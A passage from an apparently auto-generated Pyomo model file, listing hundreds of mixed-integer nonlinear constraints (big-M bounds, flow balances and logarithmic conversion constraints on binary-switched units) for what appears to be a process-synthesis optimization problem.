m.x951 - m.x1197 - m.x1200 == 0) m.c1771 = Constraint(expr= m.x952 - m.x1198 - m.x1201 == 0) m.c1772 = Constraint(expr= m.x968 - m.x1244 - m.x1247 == 0) m.c1773 = Constraint(expr= m.x969 - m.x1245 - m.x1248 == 0) m.c1774 = Constraint(expr= m.x970 - m.x1246 - m.x1249 == 0) m.c1775 = Constraint(expr= m.x1196 - 15*m.b1517 <= 0) m.c1776 = Constraint(expr= m.x1197 - 15*m.b1518 <= 0) m.c1777 = Constraint(expr= m.x1198 - 15*m.b1519 <= 0) m.c1778 = Constraint(expr= m.x1199 + 15*m.b1517 <= 15) m.c1779 = Constraint(expr= m.x1200 + 15*m.b1518 <= 15) m.c1780 = Constraint(expr= m.x1201 + 15*m.b1519 <= 15) m.c1781 = Constraint(expr= m.x1244 - 9*m.b1517 <= 0) m.c1782 = Constraint(expr= m.x1245 - 9*m.b1518 <= 0) m.c1783 = Constraint(expr= m.x1246 - 9*m.b1519 <= 0) m.c1784 = Constraint(expr= m.x1247 + 9*m.b1517 <= 9) m.c1785 = Constraint(expr= m.x1248 + 9*m.b1518 <= 9) m.c1786 = Constraint(expr= m.x1249 + 9*m.b1519 <= 9) m.c1787 = Constraint(expr=(m.x1250/(0.001 + 0.999*m.b1520) - 1.1*log(1 + m.x1202/(0.001 + 0.999*m.b1520)))*(0.001 + 0.999*m.b1520) <= 0) m.c1788 = Constraint(expr=(m.x1251/(0.001 + 0.999*m.b1521) - 1.1*log(1 + m.x1203/(0.001 + 0.999*m.b1521)))*(0.001 + 0.999*m.b1521) <= 0) m.c1789 = Constraint(expr=(m.x1252/(0.001 + 0.999*m.b1522) - 1.1*log(1 + m.x1204/(0.001 + 0.999*m.b1522)))*(0.001 + 0.999*m.b1522) <= 0) m.c1790 = Constraint(expr= m.x1205 == 0) m.c1791 = Constraint(expr= m.x1206 == 0) m.c1792 = Constraint(expr= m.x1207 == 0) m.c1793 = Constraint(expr= m.x1253 == 0) m.c1794 = Constraint(expr= m.x1254 == 0) m.c1795 = Constraint(expr= m.x1255 == 0) m.c1796 = Constraint(expr= m.x953 - m.x1202 - m.x1205 == 0) m.c1797 = Constraint(expr= m.x954 - m.x1203 - m.x1206 == 0) m.c1798 = Constraint(expr= m.x955 - m.x1204 - m.x1207 == 0) m.c1799 = Constraint(expr= m.x971 - m.x1250 - m.x1253 == 0) m.c1800 = Constraint(expr= m.x972 - m.x1251 - m.x1254 == 0) m.c1801 = Constraint(expr= m.x973 - m.x1252 - m.x1255 == 0) m.c1802 = Constraint(expr= m.x1202 - 15*m.b1520 <= 0) m.c1803 = Constraint(expr= m.x1203 - 15*m.b1521 <= 0) m.c1804 = Constraint(expr= m.x1204 - 15*m.b1522 <= 0) m.c1805 = Constraint(expr= m.x1205 + 15*m.b1520 <= 15) m.c1806 = Constraint(expr= m.x1206 + 15*m.b1521 <= 15) m.c1807 = Constraint(expr= m.x1207 + 15*m.b1522 <= 15) m.c1808 = Constraint(expr= m.x1250 - 3.04984759446376*m.b1520 <= 0) m.c1809 = Constraint(expr= m.x1251 - 3.04984759446376*m.b1521 <= 0) m.c1810 = Constraint(expr= m.x1252 - 3.04984759446376*m.b1522 <= 0) m.c1811 = Constraint(expr= m.x1253 + 3.04984759446376*m.b1520 <= 3.04984759446376) m.c1812 = Constraint(expr= m.x1254 + 3.04984759446376*m.b1521 <= 3.04984759446376) m.c1813 = Constraint(expr= m.x1255 + 3.04984759446376*m.b1522 <= 3.04984759446376) m.c1814 = Constraint(expr= - 0.9*m.x1211 + m.x1310 == 0) m.c1815 = Constraint(expr= - 0.9*m.x1212 + m.x1311 == 0) m.c1816 = Constraint(expr= - 0.9*m.x1213 + m.x1312 == 0) m.c1817 = Constraint(expr= - m.x1268 + m.x1310 == 0) m.c1818 = Constraint(expr= - m.x1269 + m.x1311 == 0) m.c1819 = Constraint(expr= - m.x1270 + m.x1312 == 0) m.c1820 = Constraint(expr= m.x1217 == 0) m.c1821 = Constraint(expr= m.x1218 == 0) m.c1822 = Constraint(expr= m.x1219 == 0) m.c1823 = Constraint(expr= m.x1271 == 0) m.c1824 = Constraint(expr= m.x1272 == 0) m.c1825 = Constraint(expr= m.x1273 == 0) m.c1826 = Constraint(expr= m.x1313 == 0) m.c1827 = Constraint(expr= m.x1314 == 0) m.c1828 = Constraint(expr= m.x1315 == 0) m.c1829 = Constraint(expr= m.x956 - m.x1211 - m.x1217 == 0) m.c1830 = Constraint(expr= m.x957 - m.x1212 - m.x1218 == 0) m.c1831 = Constraint(expr= m.x958 - m.x1213 - m.x1219 == 0) m.c1832 = Constraint(expr= m.x980 - m.x1268 - m.x1271 == 0) m.c1833 = Constraint(expr= m.x981 - m.x1269 - m.x1272 == 0) m.c1834 = Constraint(expr= m.x982 - m.x1270 - m.x1273 == 0) m.c1835 = Constraint(expr= m.x1004 - m.x1310 - m.x1313 == 0) m.c1836 = Constraint(expr= m.x1005 - m.x1311 - m.x1314 == 0) m.c1837 = Constraint(expr= m.x1006 - m.x1312 - m.x1315 == 0) m.c1838 = Constraint(expr= m.x1211 - 1.83548069293539*m.b1523 <= 0) m.c1839 = Constraint(expr= m.x1212 - 1.83548069293539*m.b1524 <= 0) m.c1840 = Constraint(expr= m.x1213 - 1.83548069293539*m.b1525 <= 0) m.c1841 = Constraint(expr= m.x1217 + 1.83548069293539*m.b1523 <= 1.83548069293539) m.c1842 = Constraint(expr= m.x1218 + 1.83548069293539*m.b1524 <= 1.83548069293539) m.c1843 = Constraint(expr= m.x1219 + 1.83548069293539*m.b1525 <= 1.83548069293539) m.c1844 = Constraint(expr= m.x1268 - 20*m.b1523 <= 0) m.c1845 = Constraint(expr= m.x1269 - 20*m.b1524 <= 0) m.c1846 = Constraint(expr= m.x1270 - 20*m.b1525 <= 0) m.c1847 = Constraint(expr= m.x1271 + 20*m.b1523 <= 20) m.c1848 = Constraint(expr= m.x1272 + 20*m.b1524 <= 20) m.c1849 = Constraint(expr= m.x1273 + 20*m.b1525 <= 20) m.c1850 = Constraint(expr= m.x1310 - 20*m.b1523 <= 0) m.c1851 = Constraint(expr= m.x1311 - 20*m.b1524 <= 0) m.c1852 = Constraint(expr= m.x1312 - 20*m.b1525 <= 0) m.c1853 = Constraint(expr= m.x1313 + 20*m.b1523 <= 20) m.c1854 = Constraint(expr= m.x1314 + 20*m.b1524 <= 20) m.c1855 = Constraint(expr= m.x1315 + 20*m.b1525 <= 20) m.c1856 = Constraint(expr=(m.x1316/(0.001 + 0.999*m.b1526) - log(1 + m.x1223/(0.001 + 0.999*m.b1526)))*(0.001 + 0.999* m.b1526) <= 0) m.c1857 = Constraint(expr=(m.x1317/(0.001 + 0.999*m.b1527) - log(1 + m.x1224/(0.001 + 0.999*m.b1527)))*(0.001 + 0.999* m.b1527) <= 0) m.c1858 = Constraint(expr=(m.x1318/(0.001 + 0.999*m.b1528) - log(1 + m.x1225/(0.001 + 0.999*m.b1528)))*(0.001 + 0.999* m.b1528) <= 0) m.c1859 = Constraint(expr= m.x1229 == 0) m.c1860 = Constraint(expr= m.x1230 == 0) m.c1861 = Constraint(expr= m.x1231 == 0) m.c1862 = Constraint(expr= m.x1319 == 0) m.c1863 = Constraint(expr= m.x1320 == 0) m.c1864 = Constraint(expr= m.x1321 == 0) m.c1865 = Constraint(expr= m.x959 - m.x1223 - m.x1229 == 0) m.c1866 = Constraint(expr= m.x960 - m.x1224 - m.x1230 == 0) m.c1867 = Constraint(expr= m.x961 - m.x1225 - m.x1231 == 0) m.c1868 = Constraint(expr= m.x1007 - m.x1316 - m.x1319 == 0) m.c1869 = Constraint(expr= m.x1008 - m.x1317 - m.x1320 == 0) m.c1870 = Constraint(expr= m.x1009 - m.x1318 - m.x1321 == 0) m.c1871 = Constraint(expr= m.x1223 - 1.32154609891348*m.b1526 <= 0) m.c1872 = Constraint(expr= m.x1224 - 1.32154609891348*m.b1527 <= 0) m.c1873 = Constraint(expr= m.x1225 - 1.32154609891348*m.b1528 <= 0) m.c1874 = Constraint(expr= m.x1229 + 1.32154609891348*m.b1526 <= 1.32154609891348) m.c1875 = Constraint(expr= m.x1230 + 1.32154609891348*m.b1527 <= 1.32154609891348) m.c1876 = Constraint(expr= m.x1231 + 1.32154609891348*m.b1528 <= 1.32154609891348) m.c1877 = Constraint(expr= m.x1316 - 0.842233385663186*m.b1526 <= 0) m.c1878 = Constraint(expr= m.x1317 - 0.842233385663186*m.b1527 <= 0) m.c1879 = Constraint(expr= m.x1318 - 0.842233385663186*m.b1528 <= 0) m.c1880 = Constraint(expr= m.x1319 + 0.842233385663186*m.b1526 <= 0.842233385663186) m.c1881 = Constraint(expr= m.x1320 + 0.842233385663186*m.b1527 <= 0.842233385663186) m.c1882 = Constraint(expr= m.x1321 + 0.842233385663186*m.b1528 <= 0.842233385663186) m.c1883 = Constraint(expr=(m.x1322/(0.001 + 0.999*m.b1529) - 0.7*log(1 + m.x1256/(0.001 + 0.999*m.b1529)))*(0.001 + 0.999*m.b1529) <= 0) m.c1884 = Constraint(expr=(m.x1323/(0.001 + 0.999*m.b1530) - 0.7*log(1 + m.x1257/(0.001 + 0.999*m.b1530)))*(0.001 + 0.999*m.b1530) <= 0) m.c1885 = Constraint(expr=(m.x1324/(0.001 + 0.999*m.b1531) - 0.7*log(1 + m.x1258/(0.001 + 0.999*m.b1531)))*(0.001 + 0.999*m.b1531) <= 0) m.c1886 = Constraint(expr= m.x1259 == 0) m.c1887 = Constraint(expr= m.x1260 == 0) m.c1888 = Constraint(expr= m.x1261 == 0) m.c1889 = Constraint(expr= m.x1325 == 0) m.c1890 = Constraint(expr= m.x1326 == 0) m.c1891 = Constraint(expr= m.x1327 == 0) m.c1892 = Constraint(expr= m.x974 - m.x1256 - m.x1259 == 0) m.c1893 = Constraint(expr= m.x975 - m.x1257 - m.x1260 == 0) m.c1894 = Constraint(expr= m.x976 - m.x1258 - m.x1261 == 0) m.c1895 = Constraint(expr= m.x1010 - m.x1322 - m.x1325 == 0) m.c1896 = Constraint(expr= m.x1011 - m.x1323 - m.x1326 == 0) m.c1897 = Constraint(expr= m.x1012 - m.x1324 - m.x1327 == 0) m.c1898 = Constraint(expr= m.x1256 - 1.26558121681553*m.b1529 <= 0) m.c1899 = Constraint(expr= m.x1257 - 1.26558121681553*m.b1530 <= 0) m.c1900 = Constraint(expr= m.x1258 - 1.26558121681553*m.b1531 <= 0) m.c1901 = Constraint(expr= m.x1259 + 1.26558121681553*m.b1529 <= 1.26558121681553) m.c1902 = Constraint(expr= m.x1260 + 1.26558121681553*m.b1530 <= 1.26558121681553) m.c1903 = Constraint(expr= m.x1261 + 1.26558121681553*m.b1531 <= 1.26558121681553) m.c1904 = Constraint(expr= m.x1322 - 0.572481933717686*m.b1529 <= 0) m.c1905 = Constraint(expr= m.x1323 - 0.572481933717686*m.b1530 <= 0) m.c1906 = Constraint(expr= m.x1324 - 0.572481933717686*m.b1531 <= 0) m.c1907 = Constraint(expr= m.x1325 + 0.572481933717686*m.b1529 <= 0.572481933717686) m.c1908 = Constraint(expr= m.x1326 + 0.572481933717686*m.b1530 <= 0.572481933717686) m.c1909 = Constraint(expr= m.x1327 + 0.572481933717686*m.b1531 <= 0.572481933717686) m.c1910 = Constraint(expr=(m.x1328/(0.001 + 0.999*m.b1532) - 0.65*log(1 + m.x1262/(0.001 + 0.999*m.b1532)))*(0.001 + 0.999*m.b1532) <= 0) m.c1911 = Constraint(expr=(m.x1329/(0.001 + 0.999*m.b1533) - 0.65*log(1 + m.x1263/(0.001 + 0.999*m.b1533)))*(0.001 + 0.999*m.b1533) <= 0) m.c1912 = Constraint(expr=(m.x1330/(0.001 + 0.999*m.b1534) - 0.65*log(1 + m.x1264/(0.001 + 0.999*m.b1534)))*(0.001 + 0.999*m.b1534) <= 0) m.c1913 = Constraint(expr=(m.x1328/(0.001 + 0.999*m.b1532) - 0.65*log(1 + m.x1274/(0.001 + 0.999*m.b1532)))*(0.001 + 0.999*m.b1532) <= 0) m.c1914 = Constraint(expr=(m.x1329/(0.001 + 0.999*m.b1533) - 0.65*log(1 + m.x1275/(0.001 + 0.999*m.b1533)))*(0.001 + 0.999*m.b1533) <= 0) m.c1915 = Constraint(expr=(m.x1330/(0.001 + 0.999*m.b1534) - 0.65*log(1 + m.x1276/(0.001 + 0.999*m.b1534)))*(0.001 + 0.999*m.b1534) <= 0) m.c1916 = Constraint(expr= m.x1265 == 0) m.c1917 = Constraint(expr= m.x1266 == 0) m.c1918 = Constraint(expr= m.x1267 == 0) m.c1919 = Constraint(expr= m.x1277 == 0) m.c1920 = Constraint(expr= m.x1278 == 0) m.c1921 = Constraint(expr= m.x1279 == 0) m.c1922 = Constraint(expr= m.x1331 == 0) m.c1923 = Constraint(expr= m.x1332 == 0) m.c1924 = Constraint(expr= m.x1333 == 0) m.c1925 = Constraint(expr= m.x977 - m.x1262 - m.x1265 == 0) m.c1926 = Constraint(expr= m.x978 - m.x1263 - m.x1266 == 0) m.c1927 = Constraint(expr= m.x979 - m.x1264 - m.x1267 == 0) m.c1928 = Constraint(expr= m.x986 - m.x1274 - m.x1277 == 0) m.c1929 = Constraint(expr= m.x987 - m.x1275 - m.x1278 == 0) m.c1930 = Constraint(expr= m.x988 - m.x1276 - m.x1279 == 0) m.c1931 = Constraint(expr= m.x1013 - m.x1328 - m.x1331 == 0) m.c1932 = Constraint(expr= m.x1014 - m.x1329 - m.x1332 == 0) m.c1933 = Constraint(expr= m.x1015 - m.x1330 - m.x1333 == 0) m.c1934 = Constraint(expr= m.x1262 - 1.26558121681553*m.b1532 <= 0) m.c1935 = Constraint(expr= m.x1263 - 1.26558121681553*m.b1533 <= 0) m.c1936 = Constraint(expr= m.x1264 - 1.26558121681553*m.b1534 <= 0) m.c1937 = Constraint(expr= m.x1265 + 1.26558121681553*m.b1532 <= 1.26558121681553) m.c1938 = Constraint(expr= m.x1266 + 1.26558121681553*m.b1533 <= 1.26558121681553) m.c1939 = Constraint(expr= m.x1267 + 1.26558121681553*m.b1534 <= 1.26558121681553) m.c1940 = Constraint(expr= m.x1274 - 33.5*m.b1532 <= 0) m.c1941 = Constraint(expr= m.x1275 - 33.5*m.b1533 <= 0) m.c1942 = Constraint(expr= m.x1276 - 33.5*m.b1534 <= 0) m.c1943 = Constraint(expr= m.x1277 + 33.5*m.b1532 <= 33.5) m.c1944 = Constraint(expr= m.x1278 + 33.5*m.b1533 <= 33.5) m.c1945 = Constraint(expr= m.x1279 + 33.5*m.b1534 <= 33.5) m.c1946 = Constraint(expr= m.x1328 - 2.30162356062425*m.b1532 <= 0) m.c1947 = Constraint(expr= m.x1329 - 2.30162356062425*m.b1533 <= 0) m.c1948 = Constraint(expr= m.x1330 - 2.30162356062425*m.b1534 <= 0) m.c1949 = Constraint(expr= m.x1331 + 2.30162356062425*m.b1532 <= 2.30162356062425) m.c1950 = Constraint(expr= m.x1332 + 2.30162356062425*m.b1533 <= 2.30162356062425) m.c1951 = Constraint(expr= m.x1333 + 2.30162356062425*m.b1534 <= 2.30162356062425) m.c1952 = Constraint(expr= - m.x1280 + m.x1334 == 0) m.c1953 = Constraint(expr= - m.x1281 + m.x1335 == 0) m.c1954 = Constraint(expr= - m.x1282 + m.x1336 == 0) m.c1955 = Constraint(expr= m.x1283 == 0) m.c1956 = Constraint(expr= m.x1284 == 0) m.c1957 = Constraint(expr= m.x1285 == 0) m.c1958 = Constraint(expr= m.x1337 == 0) m.c1959 = Constraint(expr= m.x1338 == 0) m.c1960 = Constraint(expr= m.x1339 == 0) m.c1961 = Constraint(expr= m.x989 - m.x1280 - m.x1283 == 0) m.c1962 = Constraint(expr= m.x990 - m.x1281 - m.x1284 == 0) m.c1963 = Constraint(expr= m.x991 - m.x1282 - m.x1285 == 0) m.c1964 = Constraint(expr= m.x1016 - m.x1334 - m.x1337 == 0) m.c1965 = Constraint(expr= m.x1017 - m.x1335 - m.x1338 == 0) m.c1966 = Constraint(expr= m.x1018 - m.x1336 - m.x1339 == 0) m.c1967 = Constraint(expr= m.x1280 - 9*m.b1535 <= 0) m.c1968 = Constraint(expr= m.x1281 - 9*m.b1536 <= 0) m.c1969 = Constraint(expr= m.x1282 - 9*m.b1537 <= 0) m.c1970 = Constraint(expr= m.x1283 + 9*m.b1535 <= 9) m.c1971 = Constraint(expr= m.x1284 + 9*m.b1536 <= 9) m.c1972 = Constraint(expr= m.x1285 + 9*m.b1537 <= 9) m.c1973 = Constraint(expr= m.x1334 - 9*m.b1535 <= 0) m.c1974 = Constraint(expr= m.x1335 - 9*m.b1536 <= 0) m.c1975 = Constraint(expr= m.x1336 - 9*m.b1537 <= 0) m.c1976 = Constraint(expr= m.x1337 + 9*m.b1535 <= 9) m.c1977 = Constraint(expr= m.x1338 + 9*m.b1536 <= 9) m.c1978 = Constraint(expr= m.x1339 + 9*m.b1537 <= 9) m.c1979 = Constraint(expr= - m.x1286 + m.x1340 == 0) m.c1980 = Constraint(expr= - m.x1287 + m.x1341 == 0) m.c1981 = Constraint(expr= - m.x1288 + m.x1342 == 0) m.c1982 = Constraint(expr= m.x1289 == 0) m.c1983 = Constraint(expr= m.x1290 == 0) m.c1984 = Constraint(expr= m.x1291 == 0) m.c1985 = Constraint(expr= m.x1343 == 0) m.c1986 = Constraint(expr= m.x1344 == 0) m.c1987 = Constraint(expr= m.x1345 == 0) m.c1988 = Constraint(expr= m.x992 - m.x1286 - m.x1289 == 0) m.c1989 = Constraint(expr= m.x993 - m.x1287 - m.x1290 == 0) m.c1990 = Constraint(expr= m.x994 - m.x1288 - m.x1291 == 0) m.c1991 = Constraint(expr= m.x1019 - m.x1340 - m.x1343 == 0) m.c1992 = Constraint(expr= m.x1020 - m.x1341 - m.x1344 == 0) m.c1993 = Constraint(expr= m.x1021 - m.x1342 - m.x1345 == 0) m.c1994 = Constraint(expr= m.x1286 - 9*m.b1538 <= 0) m.c1995 = Constraint(expr= m.x1287 - 9*m.b1539 <= 0) m.c1996 = Constraint(expr= m.x1288 - 9*m.b1540 <= 0) m.c1997 = Constraint(expr= m.x1289 + 9*m.b1538 <= 9) m.c1998 = Constraint(expr= m.x1290 + 9*m.b1539 <= 9) m.c1999 = Constraint(expr= m.x1291 + 9*m.b1540 <= 9) m.c2000 = Constraint(expr= m.x1340 - 9*m.b1538 <= 0) m.c2001 = Constraint(expr= m.x1341 - 9*m.b1539 <= 0) m.c2002 = Constraint(expr= m.x1342 - 9*m.b1540 <= 0) m.c2003 = Constraint(expr= m.x1343 + 9*m.b1538 <= 9) m.c2004 = Constraint(expr= m.x1344 + 9*m.b1539 <= 9) m.c2005 = Constraint(expr= m.x1345 + 9*m.b1540 <= 9) m.c2006 = Constraint(expr=(m.x1346/(0.001 + 0.999*m.b1541) - 0.75*log(1 + m.x1292/(0.001 + 0.999*m.b1541)))*(0.001 + 0.999*m.b1541) <= 0) m.c2007 = Constraint(expr=(m.x1347/(0.001 + 0.999*m.b1542) - 0.75*log(1 + m.x1293/(0.001 + 0.999*m.b1542)))*(0.001 + 0.999*m.b1542) <= 0) m.c2008 = Constraint(expr=(m.x1348/(0.001 + 0.999*m.b1543) - 0.75*log(1 + m.x1294/(0.001 + 0.999*m.b1543)))*(0.001 + 0.999*m.b1543) <= 0) m.c2009 = Constraint(expr= m.x1295 == 0) m.c2010 = Constraint(expr= m.x1296 == 0) m.c2011 = Constraint(expr= m.x1297 == 0) m.c2012 = Constraint(expr= m.x1349 == 0) m.c2013 = Constraint(expr= m.x1350 == 0) m.c2014 = Constraint(expr= m.x1351 == 0) m.c2015 = Constraint(expr= m.x995 - m.x1292 - m.x1295 == 0) m.c2016 = Constraint(expr= m.x996 - m.x1293 - m.x1296 == 0) m.c2017 = Constraint(expr= m.x997 - m.x1294 - m.x1297 == 0) m.c2018 = Constraint(expr= m.x1022 - m.x1346 - m.x1349 == 0) m.c2019 = Constraint(expr= m.x1023 - m.x1347 - m.x1350 == 0) m.c2020 = Constraint(expr= m.x1024 - m.x1348 - m.x1351 == 0) m.c2021 = Constraint(expr= m.x1292 - 3.04984759446376*m.b1541 <= 0) m.c2022 = Constraint(expr= m.x1293 - 3.04984759446376*m.b1542 <= 0) m.c2023 = Constraint(expr= m.x1294 - 3.04984759446376*m.b1543 <= 0) m.c2024 = Constraint(expr= m.x1295 + 3.04984759446376*m.b1541 <= 3.04984759446376) m.c2025 = Constraint(expr= m.x1296 + 3.04984759446376*m.b1542 <= 3.04984759446376) m.c2026 = Constraint(expr= m.x1297 + 3.04984759446376*m.b1543 <= 3.04984759446376) m.c2027 = Constraint(expr= m.x1346 - 1.04900943706034*m.b1541 <= 0) m.c2028 = Constraint(expr= m.x1347 - 1.04900943706034*m.b1542 <= 0) m.c2029 = Constraint(expr= m.x1348 - 1.04900943706034*m.b1543 <= 0) m.c2030 = Constraint(expr= m.x1349 + 1.04900943706034*m.b1541 <= 1.04900943706034) m.c2031 = Constraint(expr= m.x1350 + 1.04900943706034*m.b1542 <= 1.04900943706034) m.c2032 = Constraint(expr= m.x1351 + 1.04900943706034*m.b1543 <= 1.04900943706034) m.c2033 = Constraint(expr=(m.x1352/(0.001 + 0.999*m.b1544) - 0.8*log(1 + m.x1298/(0.001 + 0.999*m.b1544)))*(0.001 + 0.999*m.b1544) <= 0) m.c2034 = Constraint(expr=(m.x1353/(0.001 + 0.999*m.b1545) - 0.8*log(1 + m.x1299/(0.001 + 0.999*m.b1545)))*(0.001 + 0.999*m.b1545) <= 0) m.c2035 = Constraint(expr=(m.x1354/(0.001 + 0.999*m.b1546) - 0.8*log(1 + m.x1300/(0.001 + 0.999*m.b1546)))*(0.001 + 0.999*m.b1546) <= 0) m.c2036 = Constraint(expr= m.x1301 == 0) m.c2037 = Constraint(expr= m.x1302 == 0) m.c2038 = Constraint(expr= m.x1303 == 0) m.c2039 = Constraint(expr= m.x1355 == 0) m.c2040 = Constraint(expr= m.x1356 == 0) m.c2041 = Constraint(expr= m.x1357 == 0) m.c2042 = Constraint(expr= m.x998 - m.x1298 - m.x1301 == 0) m.c2043 = Constraint(expr= m.x999 - m.x1299 - m.x1302 == 0) m.c2044 = Constraint(expr= m.x1000 - m.x1300 - m.x1303 == 0) m.c2045 = Constraint(expr= m.x1025 - m.x1352 - m.x1355 == 0) m.c2046 = Constraint(expr= m.x1026 - m.x1353 - m.x1356 == 0) m.c2047 = Constraint(expr= m.x1027 - m.x1354 - m.x1357 == 0) m.c2048 = Constraint(expr= m.x1298 - 3.04984759446376*m.b1544 <= 0) m.c2049 = Constraint(expr= m.x1299 - 3.04984759446376*m.b1545 <= 0) m.c2050 = Constraint(expr= m.x1300 - 3.04984759446376*m.b1546 <= 0) m.c2051 = Constraint(expr= m.x1301 + 3.04984759446376*m.b1544 <= 3.04984759446376) m.c2052 = Constraint(expr= m.x1302 + 3.04984759446376*m.b1545 <= 3.04984759446376) m.c2053 = Constraint(expr= m.x1303 + 3.04984759446376*m.b1546 <= 3.04984759446376) m.c2054 = Constraint(expr= m.x1352 - 1.11894339953103*m.b1544 <= 0) m.c2055 = Constraint(expr= m.x1353 - 1.11894339953103*m.b1545 <= 0) m.c2056 = Constraint(expr= m.x1354 - 1.11894339953103*m.b1546 <= 0) m.c2057 = Constraint(expr= m.x1355 + 1.11894339953103*m.b1544 <= 1.11894339953103) m.c2058 = Constraint(expr= m.x1356 + 1.11894339953103*m.b1545 <= 1.11894339953103) m.c2059 = Constraint(expr= m.x1357 + 1.11894339953103*m.b1546 <= 1.11894339953103) m.c2060 = Constraint(expr=(m.x1358/(0.001 + 0.999*m.b1547) - 0.85*log(1 + m.x1304/(0.001 + 0.999*m.b1547)))*(0.001 + 0.999*m.b1547) <= 0) m.c2061 = Constraint(expr=(m.x1359/(0.001 + 0.999*m.b1548) - 0.85*log(1 + m.x1305/(0.001 + 0.999*m.b1548)))*(0.001 + 0.999*m.b1548) <= 0) m.c2062 = Constraint(expr=(m.x1360/(0.001 + 0.999*m.b1549) - 0.85*log(1 + m.x1306/(0.001 + 0.999*m.b1549)))*(0.001 + 0.999*m.b1549) <= 0) m.c2063 = Constraint(expr= m.x1307 == 0) m.c2064 = Constraint(expr= m.x1308 == 0) m.c2065 = Constraint(expr= m.x1309 == 0) m.c2066 = Constraint(expr= m.x1361 == 0) m.c2067 = Constraint(expr= m.x1362 == 0) m.c2068 = Constraint(expr= m.x1363 == 0) m.c2069 = Constraint(expr= m.x1001 - m.x1304 - m.x1307 == 0) m.c2070 = Constraint(expr= m.x1002 - m.x1305 - m.x1308 == 0) m.c2071 = Constraint(expr= m.x1003 - m.x1306 - m.x1309 == 0) m.c2072 = Constraint(expr= m.x1028 - m.x1358 - m.x1361 == 0) m.c2073 = Constraint(expr= m.x1029 - m.x1359 - m.x1362 == 0) m.c2074 = Constraint(expr= m.x1030 - m.x1360 - m.x1363 == 0) m.c2075 = Constraint(expr= m.x1304 - 3.04984759446376*m.b1547 <= 0) m.c2076 = Constraint(expr= m.x1305 - 3.04984759446376*m.b1548 <= 0) m.c2077 = Constraint(expr= m.x1306 - 3.04984759446376*m.b1549 <= 0) m.c2078 = Constraint(expr= m.x1307 + 3.04984759446376*m.b1547 <= 3.04984759446376) m.c2079 = Constraint(expr= m.x1308 + 3.04984759446376*m.b1548 <= 3.04984759446376) m.c2080 = Constraint(expr= m.x1309 + 3.04984759446376*m.b1549 <= 3.04984759446376) m.c2081 = Constraint(expr= m.x1358 - 1.18887736200171*m.b1547 <= 0) m.c2082 = Constraint(expr= m.x1359 - 1.18887736200171*m.b1548 <= 0) m.c2083 = Constraint(expr= m.x1360 - 1.18887736200171*m.b1549 <= 0) m.c2084 = Constraint(expr= m.x1361 + 1.18887736200171*m.b1547 <= 1.18887736200171) m.c2085 = Constraint(expr= m.x1362 + 1.18887736200171*m.b1548 <= 1.18887736200171) m.c2086 = Constraint(expr= m.x1363 + 1.18887736200171*m.b1549 <= 1.18887736200171) m.c2087 = Constraint(expr=(m.x1376/(0.001 + 0.999*m.b1550) - log(1 + m.x1364/(0.001 + 0.999*m.b1550)))*(0.001 + 0.999* m.b1550) <= 0) m.c2088 = Constraint(expr=(m.x1377/(0.001 + 0.999*m.b1551) - log(1 + m.x1365/(0.001 + 0.999*m.b1551)))*(0.001 + 0.999* m.b1551) <= 0) m.c2089 = Constraint(expr=(m.x1378/(0.001 + 0.999*m.b1552) - log(1 + m.x1366/(0.001 + 0.999*m.b1552)))*(0.001 + 0.999* m.b1552) <= 0) m.c2090 = Constraint(expr= m.x1367 == 0) m.c2091 = Constraint(expr= m.x1368 == 0) m.c2092 = Constraint(expr= m.x1369 == 0) m.c2093 = Constraint(expr= m.x1379 == 0) m.c2094 = Constraint(expr= m.x1380 == 0) m.c2095 = Constraint(expr= m.x1381 == 0) m.c2096 = Constraint(expr= m.x1034 - m.x1364 - m.x1367 == 0) m.c2097 = Constraint(expr= m.x1035 - m.x1365 - m.x1368 == 0) m.c2098 = Constraint(expr= m.x1036 - m.x1366 - m.x1369 == 0) m.c2099 = Constraint(expr= m.x1040 - m.x1376 - m.x1379 == 0) m.c2100 = Constraint(expr= m.x1041 - m.x1377 - m.x1380 == 0) m.c2101 = Constraint(expr= m.x1042 - m.x1378 - m.x1381 == 0) m.c2102 = Constraint(expr= m.x1364 - 1.18887736200171*m.b1550 <= 0) m.c2103 = Constraint(expr= m.x1365 - 1.18887736200171*m.b1551 <= 0) m.c2104 = Constraint(expr= m.x1366 - 1.18887736200171*m.b1552 <= 0) m.c2105 = Constraint(expr= m.x1367 + 1.18887736200171*m.b1550 <= 1.18887736200171) m.c2106 = Constraint(expr= m.x1368 + 1.18887736200171*m.b1551 <= 1.18887736200171) m.c2107 = Constraint(expr= m.x1369 + 1.18887736200171*m.b1552 <= 1.18887736200171) m.c2108 = Constraint(expr= m.x1376 - 0.78338879230327*m.b1550 <= 0) m.c2109 = Constraint(expr= m.x1377 - 0.78338879230327*m.b1551 <= 0) m.c2110 = Constraint(expr= m.x1378 - 0.78338879230327*m.b1552 <= 0) m.c2111 = Constraint(expr= m.x1379 + 0.78338879230327*m.b1550 <= 0.78338879230327) m.c2112 = Constraint(expr= m.x1380 + 0.78338879230327*m.b1551 <= 0.78338879230327) m.c2113 = Constraint(expr= m.x1381 + 0.78338879230327*m.b1552 <= 0.78338879230327) m.c2114 = Constraint(expr=(m.x1382/(0.001 + 0.999*m.b1553) - 1.2*log(1 + m.x1370/(0.001 + 0.999*m.b1553)))*(0.001 + 0.999*m.b1553) <= 0) m.c2115 = Constraint(expr=(m.x1383/(0.001 + 0.999*m.b1554) - 1.2*log(1 + m.x1371/(0.001 + 0.999*m.b1554)))*(0.001 + 0.999*m.b1554) <= 0) m.c2116 = Constraint(expr=(m.x1384/(0.001 + 0.999*m.b1555) - 1.2*log(1 + m.x1372/(0.001 + 0.999*m.b1555)))*(0.001 + 0.999*m.b1555) <= 0) m.c2117 = Constraint(expr= m.x1373 == 0) m.c2118 = Constraint(expr= m.x1374 == 0) m.c2119 = Constraint(expr= m.x1375 == 0) m.c2120 = Constraint(expr= m.x1385 == 0) m.c2121 = Constraint(expr= m.x1386 == 0) m.c2122 = Constraint(expr= m.x1387 == 0) m.c2123 = Constraint(expr= m.x1037 - m.x1370 - m.x1373 == 0) m.c2124 = Constraint(expr= m.x1038 - m.x1371 - m.x1374 == 0) m.c2125 = Constraint(expr= m.x1039 - m.x1372 - m.x1375 == 0) m.c2126 = Constraint(expr= m.x1043 - m.x1382 - m.x1385 == 0) m.c2127 = Constraint(expr= m.x1044 - m.x1383 - m.x1386 == 0) m.c2128 = Constraint(expr= m.x1045 - m.x1384 - m.x1387 == 0) m.c2129 = Constraint(expr= m.x1370 - 1.18887736200171*m.b1553 <= 0) m.c2130 = Constraint(expr= m.x1371 - 1.18887736200171*m.b1554 